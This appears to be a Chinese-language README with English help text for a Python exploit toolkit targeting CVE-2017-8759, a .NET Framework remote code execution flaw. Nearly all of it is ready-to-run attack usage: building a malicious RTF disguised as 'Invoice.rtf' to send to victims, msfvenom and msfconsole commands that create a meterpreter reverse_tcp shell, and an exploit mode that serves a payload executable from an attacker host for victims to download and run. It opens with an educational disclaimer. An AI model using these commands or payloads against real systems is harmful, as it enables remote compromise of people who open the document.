CVE-2017-8759 漏洞利用工具是一个方便的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方法来测试 Microsoft .NET Framework 远程代码执行(RCE)。它可以生成恶意 RTF 文件,并在无需任何复杂配置的情况下将 metasploit / meterpreter / 其他 payload 传递给受害者。
本程序仅供教育目的使用。未经许可请勿使用。通常的免责声明同样适用,尤其是本人(bhdresh)不对因直接或间接使用这些程序提供的信息或功能而造成的任何损害负责。作者或任何互联网服务提供商对这些程序或其任何衍生品的内容或滥用不承担任何责任。使用本程序即表示您接受以下事实:因使用这些程序而造成的任何损害(数据丢失、系统崩溃、系统入侵等)均非 bhdresh 的责任。
最后,这是一个个人开发项目,请尊重其理念,不要将其用于不良用途!
该脚本引入了以下功能:
- 生成恶意 RTF 文件
- 针对生成的 RTF 文件的利用模式
版本:Python 2.7.13
1) 生成恶意 RTF 文件
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (可选,如果使用 MSF Payload):生成 metasploit payload 并启动 handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) 以利用模式启动工具包以投递本地 payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.